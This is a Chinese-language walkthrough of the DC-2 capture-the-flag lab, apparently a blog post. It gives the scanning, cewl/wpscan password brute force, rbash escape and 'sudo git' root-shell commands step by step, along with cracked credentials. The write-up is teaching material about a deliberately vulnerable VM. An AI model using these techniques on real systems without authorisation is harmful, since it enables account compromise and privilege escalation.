dc-2靶机-超详解

标签：bin __ dc 详解 usr tom PATH 靶机

dc-2内网靶

1、信息收集

入站信息

nmap扫描

nmap -A -p- -v 192.168.27.0/24

得到消息：

IP：192.168.227.139
cms:wordpress 4.7.10
开放端口及服务：80(http)、7744(ssh)

页面信息

访问ip发现跳转，猜测可能是域名重定向

修改hosts文件

重新访问，访问成功发现flag1

访问成功发现flag1

标志 1：

你通常的单词列表可能不起作用，所以相反，也许你只需要 cewl。

密码越多越好，但有时您无法全部赢得密码。

以一个身份登录以查看下一个标志。

如果找不到它，请以其他人身份登录。

提示：用cewl(CeWL是一款以爬虫模式在指定URL上收集单词的工具，可以将它收集到的单词纳入密码字典，以提高密码破解工具的成功率。）

目录爆破

dirb目录扫描工具

dirb http://dc-2

dirsearch工具

dirsearch -u http://dc-2/ -x 404,403

访问页面

http://dc-2/wp-admin

2、渗透开始

cewl生成字典

cewl http://dc-2/ -w pa.txt

wpscan枚举爆破

用户名获取

WPScan是一个扫描 WordPress 漏洞的黑盒子扫描器，它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题。我们还使用了 Nikto ，它是一款非常棒的Web 服务器评估工具，我们认为这个工具应该成为所有针对 WordPress网站进行的渗透测试的一部分

wpscan --url http://dc-2 -e u

得到三个用户名

admin Jerry tom

爆破

burp爆破

wpscan爆破

wpscan --url http://dc-2 -U user.txt -P pa.txt

得到两个用户名和密码

jerry adipiscing
tom	  parturient

登录

分别登录两个账号，jerry账号下面发现flag2

提示为

如果你无法利用 WordPress 并走捷径，还有另一种方法。
希望您找到另一个切入点。

提权

ssh连接

前面提示找另外一个切入点，不能在利用word press ，此时根据前面扫描发现ssh端口开启此时连接ssh

ssh 

尝试登录发现只有tom登录成功

查看文件

权限限制

发现没有权限，并且有限制'-rbash'，可以明显看出来是rbash逃逸

思路：1、根据一些漏洞穿越rbash，2、利用仅有的漏洞或者其他查看一些文件

此时查看当前用户可执行命令

echo $PATH 				//输出路径
echo /home/tom/usr/bin/*		//输出可用命令

可以使用的命令有：less 、ls、scp、vi

/home/tom/usr/bin/less 
/home/tom/usr/bin/ls 
/home/tom/usr/bin/scp 
/home/tom/usr/bin/vi

利用vi 或者less得到到第三个flag

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追赶杰瑞。 也许他应该忍受他造成的所有压力。

提示此时需要用su命令切换用户，但是此时可以使用的命令只有上面几个，那么接下来就要提权，而这里涉及的是切换用户逃逸

su命令，只会更改当前用户，而不会更改当前的用户环境，比如你从kali用户su到root账户中，当前路径仍是你刚才的路径，环境变量仍是kali用户的
su- 命令，则在更改当前用户信息的同时还会更改用户环境，但是假如你从kali 用户su -到root账户，你会发现你的当前路径已经变为/root/，环境变量也变了

rbash提权

详细的建议去看看rbash逃逸

less绕过

scp -S /path/yourscript x y:

ls绕过

vi绕过

set shell=/bin/bash
shell
echo $PATH
export PATH='/user/bin:/bin'

更改变量绕过

BASH_CMDS[a]=/bin/sh;a      //使用并添加环境变量
export PATH=$PATH:/bin/     //将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin  //将/usr/bin作为PATH环境变量导出

切换用户

发现flag4

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

git提权

在flag4中表示还有一个flag，但是没有提示，在最后有一个git，那么此时应该是git提权

输入
sudo git -p help
在最后面输入:!/bin/bash
查看flag:
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

设及到的知识点：

Linux基本命令的使用

重定向

nmap扫描识别

目录爆破（敏感目录）

cewl的使用

wpscan的使用

ssh工具指定端口终端连接

rbash逃逸

git提权

标签：bin,__,dc,详解,usr,tom,PATH,靶机
From： https://www.cnblogs.com/yuell/p/18114514